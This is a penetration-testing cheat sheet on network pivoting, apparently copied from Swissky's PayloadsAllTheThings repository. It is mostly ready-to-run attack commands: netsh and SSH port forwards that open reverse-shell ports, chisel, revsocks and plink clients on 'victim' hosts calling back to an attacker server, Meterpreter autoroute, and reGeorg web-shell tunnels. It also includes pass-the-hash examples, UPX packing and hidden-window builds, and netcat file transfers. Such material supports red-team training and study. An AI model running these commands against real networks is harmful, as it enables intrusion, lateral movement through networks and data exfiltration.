Network Pivoting Techniques



Pivoting is the method in which we get access obtained over one machine to exploit another machine deeper in the network. Using Pivoting it becomes possible for an attacker [ once it gains initial access to a remote network System] to access other machines in the network that would not otherwise be accessible.

Windows netsh Port Forwarding

netsh interface portproxy add v4tov4 listenaddress=localaddress listenport=localport connectaddress=destaddress connectport=destport
netsh interface portproxy add v4tov4 listenport=3340 listenaddress= connectport=3389 connectaddress=

# Forward the port 4545 for the reverse shell, and the 80 for the http server for example
netsh interface portproxy add v4tov4 listenport=4545 connectaddress= connectport=4545
netsh interface portproxy add v4tov4 listenport=80 connectaddress= connectport=80
# Correctly open the port on the machine
netsh advfirewall firewall add rule name="PortForwarding 80" dir=in action=allow protocol=TCP localport=80
netsh advfirewall firewall add rule name="PortForwarding 80" dir=out action=allow protocol=TCP localport=80
netsh advfirewall firewall add rule name="PortForwarding 4545" dir=in action=allow protocol=TCP localport=4545
netsh advfirewall firewall add rule name="PortForwarding 4545" dir=out action=allow protocol=TCP localport=4545
  1. listenaddress – is a local IP address waiting for a connection.
  2. listenport – local listening TCP port (the connection is waited on it).
  3. connectaddress – is a local or remote IP address (or DNS name) to which the incoming connection will be redirected.
  4. connectport – is a TCP port to which the connection from listenport is forwarded to.



ssh -D8080 [user]@[host]

ssh -N -f -D 9000 [user]@[host]
-f : ssh in background
-N : do not execute a remote command

Cool Tip : Konami SSH Port forwarding

[ENTER] + [~C]
-D 1090

Local Port Forwarding

ssh -L [bindaddr]:[port]:[dsthost]:[dstport] [user]@[host]

Remote Port Forwarding

ssh -R [bindaddr]:[port]:[localhost]:[localport] [user]@[host]
ssh -R 3389: root@


Config file: /etc/proxychains.conf

socks4 localhost 8080

Set the SOCKS4 proxy then proxychains nmap -sT


A flexible tool for redirecting a given program’s TCP traffic to SOCKS5 or HTTP proxy.

Same as proxychains, with another mechanism to “proxify” which allow Go applications.


# Create a SOCKS5, using Chisel or another tool and forward it through SSH
(attacker) $ ssh -fNT -i /tmp/id_rsa -L 1080: root@IP_VPS
(vps) $ ./chisel server --tls-key ./key.pem --tls-cert ./cert.pem -p 8443 -reverse 
(victim 1) $ ./chisel client --tls-skip-verify https://IP_VPS:8443 R:socks 

# Run graftcp and specify the SOCKS5
(attacker) $ graftcp-local -listen :2233 -logfile /tmp/toto -loglevel 6 -socks5
(attacker) $ graftcp ./nuclei -u

Simple configuration file for graftcp

## Listen address (default ":2233")
listen = :2233
loglevel = 1

## SOCKS5 address (default "")
socks5 =
# socks5_username = SOCKS5USERNAME
# socks5_password = SOCKS5PASSWORD

## Set the mode for select a proxy (default "auto")
select_proxy_mode = auto

Web SOCKS – reGeorg

reGeorg, the successor to reDuh, pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.

Drop one of the following files on the server:

  • tunnel.ashx
  • tunnel.aspx
  • tunnel.js
  • tunnel.jsp
  • tunnel.nosocket.php
  • tunnel.php
  • tunnel.tomcat.5.jsp
python -p 8080 -u # the socks proxy will be on port 8080

optional arguments:
  -h, --help           show this help message and exit
  -l , --listen-on     The default listening address
  -p , --listen-port   The default listening port
  -r , --read-buff     Local read buffer, max data to be sent per POST
  -u , --url           The url containing the tunnel script
  -v , --verbose       Verbose output[INFO|DEBUG]

Web SOCKS – pivotnacci

pivotnacci, a tool to make socks connections through HTTP agents.

pip3 install pivotnacci
pivotnacci --password "s3cr3t"
pivotnacci --polling-interval 2000


# Meterpreter list active port forwards
portfwd list 

# Forwards 3389 (RDP) to 3389 on the compromised machine running the Meterpreter shell
portfwd add –l 3389 –p 3389 –r target-host 
portfwd add -l 88 -p 88 -r
portfwd add -L -l 445 -r -p 445

# Forwards 3389 (RDP) to 3389 on the compromised machine running the Meterpreter shell
portfwd delete –l 3389 –p 3389 –r target-host 
# Meterpreter delete all port forwards
portfwd flush 


# Use Meterpreters autoroute script to add the route for specified subnet
run autoroute -s 
use auxiliary/server/socks_proxy
set SRVPORT 9090
set VERSION 4a
# or
use auxiliary/server/socks4a     # (deprecated)

# Meterpreter list all active routes
run autoroute -p 

route #Meterpreter view available networks the compromised host can access
# Meterpreter add route for via Session number.
route add 3 
# Meterpreter delete route for via Session number.
route delete 3 
# Meterpreter delete all routes
route flush 


(Empire) > socksproxyserver
(Empire) > use module management/invoke_socksproxy
(Empire) > set remoteHost
(Empire) > run


Transparent proxy server that works as a poor man’s VPN. Forwards over ssh.

  • Doesn’t require admin.
  • Works with Linux and MacOS.
  • Supports DNS tunneling.
pacman -Sy sshuttle
apt-get install sshuttle
sshuttle -vvr user@
sshuttle -vvr username@pivot_host 

# using a private key
$ sshuttle -vvr root@ -e "ssh -i ~/.ssh/id_rsa" 

# -x == exclude some network to not transmit over the tunnel
# -x x.x.x.x.x/24


go get -v

# forward port 389 and 88 to hacker computer
user@hacker$ /opt/chisel/chisel server -p 8008 --reverse
user@victim$ .\chisel.exe client YOUR_IP:8008 R:88: R:389:localhost:389 

user@victim$ .\chisel.exe client YOUR_IP:8008 R:socks


A C# Wrapper of Chisel :

user@hacker$ ./chisel server -p 8080 --key "private" --auth "user:pass" --reverse --proxy ""
server : run the Server Component of chisel 
-p 8080 : run server on port 8080
--key "private": use "private" string to seed the generation of a ECDSA public and private key pair
--auth "user:pass" : Creds required to connect to the server
--reverse:  Allow clients to specify reverse port forwarding remotes in addition to normal remotes.
--proxy : Specifies another HTTP server to proxy requests to when chisel receives a normal HTTP request. Useful for hiding chisel in plain sight.

user@victim$ SharpChisel.exe client --auth user:pass R:1080:socks


Ligolo : Reverse Tunneling made easy for pentesters, by pentesters

  1. Build Ligolo
# Get Ligolo and dependencies
cd `go env GOPATH`/src
git clone
cd ligolo
make dep

# Generate self-signed TLS certificates (will be placed in the certs folder)
make certs

make build-all
  1. Use Ligolo
# On your attack server.

# On the compromise host.
ligolo_windows_amd64.exe -relayserver LOCALRELAYSERVER:5555


Wiki English :

git clone
cd gost/cmd/gost
go build

# Socks5 Proxy
Server side: gost -L=socks5://:1080
Client side: gost -L=:8080 -F=socks5://server_ip:1080?notls=true

# Local Port Forward
gost -L=tcp://:2222/ [-F=..]


Server (Attacker box)

python --proxy-port 1080 --server-port 9443 --server-ip

Client (Compromised box)

python --server-ip <ip> --server-port 9443

Through corporate proxy

python --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [proxy ip] \
--ntlm-proxy-port 8080 --domain CORP --username jdoe --password 1q2w3e

Passing the hash

python --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [proxy ip] \
--ntlm-proxy-port 8080 --domain CORP --username jdoe \
--hashes 986D46921DDE3E58E03656362614DEFE:50C189A98FF73B39AAD3B435B51404EE


# Listen on the server and create a SOCKS 5 proxy on port 1080
user@VPS$ ./revsocks -listen :8443 -socks -pass Password1234

# Connect client to the server
user@PC$ ./revsocks -connect -pass Password1234
user@PC$ ./revsocks -connect -pass Password1234 -proxy proxy.domain.local:3128 -proxyauth Domain/userpame:userpass -useragent "Mozilla 5.0/IE Windows 10"
# Build for Linux
git clone
export GOPATH=~/go
go get
go get
go get
go build
go build -ldflags="-s -w" && upx --brute revsocks

# Build for Windows
go get
go get
go get
GOOS=windows GOARCH=amd64 go build -ldflags="-s -w"
go build -ldflags -H=windowsgui
upx revsocks


# exposes the SMB port of the machine in the port 445 of the SSH Server
plink -l root -pw toor -R 445: 
# exposes the RDP port of the machine in the port 3390 of the SSH Server
plink -l root -pw toor ssh-server-ip -R 3390:  

plink -l root -pw mypassword -R
plink.exe -v -pw mypassword user@ -L 6666:

plink -R [Port to forward to on your VPS]:localhost:[Port to forward on your local machine] [VPS IP]
# redirects the Windows port 445 to Kali on port 22
plink -P 22 -l root -pw some_password -C -R 445:   


# get the binary

# log into the service
./ngrok authtoken 3U[REDACTED_TOKEN]Hm

# deploy a port forwarding for 4433
./ngrok http 4433
./ngrok tcp 4433


# Get the binary
tar xvzf cloudflared-stable-linux-amd64.tgz
# Expose accessible internal service to the internet
./cloudflared tunnel --url <protocol>://<host>:<port>

Basic Pivoting Types

TypeUse Case
Listen – ListenExposed asset, may not want to connect out.
Listen – ConnectNormal redirect.
Connect – ConnectCan’t bind, so connect to bridge two hosts

Listen – Listen

TypeUse Case
ncatncat -v -l -p 8080 -c "ncat -v -l -p 9090"
socatsocat -v tcp-listen:8080 tcp-listen:9090
remote host 1ncat localhost 8080 < file
remote host 2ncat localhost 9090 > newfile

Listen – Connect

TypeUse Case
ncatncat -l -v -p 8080 -c "ncat localhost 9090"
socatsocat -v tcp-listen:8080,reuseaddr tcp-connect:localhost:9090
remote host 1ncat localhost -p 8080 < file
remote host 2ncat -l -p 9090 > newfile

Connect – Connect

TypeUse Case
ncatncat localhost 8080 -c "ncat localhost 9090"
socatsocat -v tcp-connect:localhost:8080,reuseaddr tcp-connect:localhost:9090
remote host 1ncat -l -p 8080 < file
remote host 2ncat -l -p 9090 > newfile


The Pivoting Techniques is a github repository by Swissky